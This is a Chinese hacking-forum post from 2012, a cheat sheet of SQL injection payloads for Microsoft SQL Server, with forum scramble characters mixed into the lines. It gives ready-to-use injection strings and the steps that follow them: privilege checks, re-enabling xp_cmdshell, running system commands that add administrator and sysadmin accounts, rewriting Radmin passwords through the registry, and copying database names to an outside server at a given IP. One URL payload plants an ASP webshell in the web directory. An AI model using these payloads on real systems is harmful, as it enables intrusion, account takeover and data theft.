找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1953|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
& w& R# p0 B" D. ~8 h//看看是什么权限的4 t  }0 z0 h/ S
and 1=(Select IS_MEMBER('db_owner'))1 u" |( V" M# J/ A
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--) {; O7 L0 Y' v+ ?& G& L

- L8 I( p1 P+ a; V//检测是否有读取某数据库的权限1 g2 i$ y- f4 E2 D" Q  O0 R
and 1= (Select HAS_DBACCESS('master'))
, O% ^  d. |$ WAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
1 g; k% y  T; t# G4 u
- ^4 ~& Z; `* z( c  a, Y. ~+ q  y8 H2 _
数字类型' W% i  O( {! P4 t( d& t: f
and char(124)%2Buser%2Bchar(124)=0
$ W1 Y& }; F% P, J4 }% V& `0 [1 y6 P# g' E: l( K
字符类型
3 n( t5 v# B7 d* v' and char(124)%2Buser%2Bchar(124)=0 and ''='
9 l4 Z  f' c" y6 ~. Z( K& d. R& f- f: u. V, G
搜索类型
, H6 m0 q: d0 w% x' and char(124)%2Buser%2Bchar(124)=0 and '%'=') r. j. V. O2 F7 Y
7 y2 D3 |& W, ~! q% `# Z. z
爆用户名
' D% D( I" K, r) Oand user>0
/ h! Z9 N+ `1 }9 ^' and user>0 and ''='' O- ^: `1 f. \6 x  v" G

' w6 y7 u$ @6 q检测是否为SA权限* i$ f5 E' }% X3 w( C
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--" E1 [8 }: W/ y# N3 d9 \& C" K
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --: P5 s4 i/ h$ G" B4 K

* i! U  ^' W9 `9 @检测是不是MSSQL数据库
2 T3 }$ T. b' eand exists (select * from sysobjects);-- : W6 e) o: w. P" z, ~- g1 e
3 m5 ~2 _9 N9 P& @! `! z' m; J
检测是否支持多行3 M) v- M( e# i
;declare @d int;-- ( Q0 T/ Z8 A& X( ?8 B5 l; v
! L( }* T$ R; g0 a% c9 {
恢复 xp_cmdshell* G. z7 y* W2 _8 l! Q) O$ O" w
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--% w# j$ Y7 V% Z0 q
* {! D7 t: i5 }2 ]# e
4 [4 q1 w  {- v( h" A2 J/ F; ~
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
" F( f; [3 A; Y8 T1 B; ^" T: l' B+ a. F5 V5 ~
//-----------------------
9 S7 n% ?! j& Z) K! t//      执行命令5 J9 L! Q( [2 r, P+ _& T
//-----------------------
$ N; i, @3 v0 k, a+ l首先开启沙盘模式:0 v/ S, V3 z, R$ M
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
/ b% g! l+ [$ \' ?- V
$ Z$ J/ |" e5 q: C# a0 a* p! W然后利用jet.oledb执行系统命令0 w; k! o/ D9 K6 w; g2 r
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')$ d; q; \8 m- |( y9 t

- L! G, P- l: R6 V# D执行命令& q  G- S4 e5 A- j! F8 l9 @
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
6 O" _% ]* c* s8 ~  o: ?+ ~' B5 ~' m4 \5 S9 d
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
7 u6 c# D1 V- f7 C6 V! G' U6 z) I3 N+ D# Z) K
判断xp_cmdshell扩展存储过程是否存在:3 Z$ ]+ Q) {/ j- N; H
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
% F* j+ h7 S# f# K6 S2 e" G5 N3 y9 b( i5 K1 L, n
写注册表
2 R8 `$ g  w) C1 J: Sexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
% P6 x: J0 v& Z/ |* @( z7 C& a1 y' I# ~; v  U; x
REG_SZ: |6 V: t; z, H& g$ A; d; G
! W1 L0 D7 Y! |( J
读注册表
* A6 p& G! z  ~4 m2 z- Pexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
$ a6 X. \8 H9 j# D+ i  O0 O( k! {" o5 @0 _' d
读取目录内容- V- x0 K4 G. E8 |2 w8 Y6 @# x0 m3 F
exec master..xp_dirtree 'c:\winnt\system32\',1,1! R% p* B  `. m) ]

7 F8 H7 F! x7 M" ^' S; o+ d6 M- k6 Z4 W
数据库备份/ z* Q9 s  U1 I
backup database pubs to disk = 'c:\123.bak'
( d% T, A5 Z! E+ i3 R0 Q5 ^4 [, t" F( s4 Q8 o: r% t3 \# F, ]
//爆出长度4 r, x0 x- M9 \3 k
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
# C: w3 n# ^! ^! k
" Q) z8 ^1 y. v  L3 Y  s: j+ M: g

; k/ ^5 A5 Q3 Y: |更改sa口令方法:用sql综合利用工具连接后,执行命令:
& ^1 S0 @- _5 q) U# p3 A* G7 Q" Nexec sp_password NULL,'新密码','sa'
  l' [6 Q- ~. l, ~) J7 \: h' b. T3 {; @/ W& s$ v* u
添加和删除一个SA权限的用户test:# ?2 Q& O9 G, l/ ~
exec master.dbo.sp_addlogin test,ptlove
8 ~) s9 A3 D' T* qexec master.dbo.sp_addsrvrolemember test,sysadmin, T6 d; w. b% E4 u
& n8 U0 F  N0 u4 R. b
删除扩展存储过过程xp_cmdshell的语句:
" @& U# D3 u  u% K* m7 D6 l, B1 A. eexec sp_dropextendedproc 'xp_cmdshell'  |: B# A5 A; |! |6 ]4 j# c
$ Q* \, `9 R& {( U9 m! A
添加扩展存储过过程
: u- U. M! D/ i) ?$ R% m$ ?) rEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
6 l" R# s& [$ f, WGRANT exec On xp_proxiedadata TO public
5 E. ^4 }6 a  I) f- K+ z
4 D8 |' y& d$ l2 b  {/ E( j" X. @' H% u0 ^, j
停掉或激活某个服务。 2 y4 X5 j( k) \* ~, T5 r6 z
+ E9 ?& K4 W( q4 m% ?$ |. G5 @- |
exec master..xp_servicecontrol 'stop','schedule'' z2 j% l5 e" R3 Q
exec master..xp_servicecontrol 'start','schedule'
! g+ a/ N' M4 J- Y
! A/ X( \* t1 J# Idbo.xp_subdirs$ Q6 C' Q' ]. d1 G

. V1 v& {5 y9 `: n. v4 U只列某个目录下的子目录。2 @0 y; _& ~" L1 {# f4 ~0 f
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'; E# E! d5 h  E# {' c- C9 m
# w! b$ q+ i" {2 T' T
dbo.xp_makecab
* `5 `& A) {; z
$ V& j! H* [' K+ \  N" U将目标多个档案压缩到某个目标档案之内。1 W* g+ c$ k8 {4 U, D' u4 Q; e/ K
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
0 q9 M: k' K  c
( C6 f" N" R, r' v1 x( adbo.xp_makecab
3 Z$ X2 Y7 f0 f; x+ V: b) d. t$ d'c:\test.cab','mszip',1,3 M- l3 X: {& s# h( V( r5 v1 R
'C:\Inetpub\wwwroot\SQLInject\login.asp',
  J% z: z; s2 M'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
) W8 E) L5 X" z, x- s( Q- s$ q
+ ?  I0 r/ A4 r, ]xp_terminate_process3 S: @( B9 s. ^- n
9 j5 x6 C' A1 |9 L1 O) y  Y1 B! ]$ g
停掉某个执行中的程序,但赋予的参数是 Process ID。
; U3 D6 w0 S+ @% g5 V8 g2 W; F' N, G利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
5 r+ Q8 A7 c2 ^+ ^5 |/ D$ U
, Z% X  P8 M2 [, N: B* ]xp_terminate_process 2484
' y' g$ d  g' \0 x8 [$ f
1 h3 ?' X" v1 e; X- ]xp_unpackcab5 G- r5 p+ f. O4 A8 K+ D; {. R4 C

7 v. e5 H7 H6 w% k0 ]4 f5 w& T解开压缩档。
7 a) z) C0 i5 ]% v0 T8 O. M/ ~, V1 Y* K4 s5 I- v
xp_unpackcab 'c:\test.cab','c:\temp',1/ x$ M2 t$ c. M3 C  Q' L
& u' n. v# W' U

0 M9 a+ b: h% w( A! c" @某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
5 f' s; v/ |- q( J* U- @  ~9 `
1 O' E; z" A8 ~" O8 K0 r$ Ycreate database lcx;
& C* I. N+ w6 X) w- J1 cCreate TABLE ku(name nvarchar(256) null);1 V& u5 S2 I1 ]% Y( }; K3 M0 h
Create TABLE biao(id int NULL,name nvarchar(256) null);/ f5 i8 T* t  v2 D; Z. @

' X" p1 b- _0 R//得到数据库名
. r* ?0 _5 q9 ]- }3 D& _, zinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
) r( s: r+ O9 F$ b2 q: H+ o
  O9 T+ o" P% M0 o! ]9 s
, S* t+ h4 b* `" O) u. _- r//在Master中创建表,看看权限怎样
; F/ y# c+ v% w- e6 e4 j4 D1 R/ vCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
& y9 G# e# ~3 s- m
% Q' L8 A9 E) j. k. T1 }5 }: i7 ]用 sp_makewebtask直接在web目录里写入一句话马:
8 s& e. P5 s/ k) Uhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
8 g9 o8 L: q7 n9 R
# g, v. R7 C+ M# `6 Z0 E//更新表内容
0 O) t$ f' r- u" W8 kUpdate films SET kind = 'Dramatic' Where id = 123* m# J" l9 P; \7 G) X, s) M

) Y+ @1 _+ t# W6 C//删除内容$ g# g! V9 _/ {9 O# X9 B" R
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表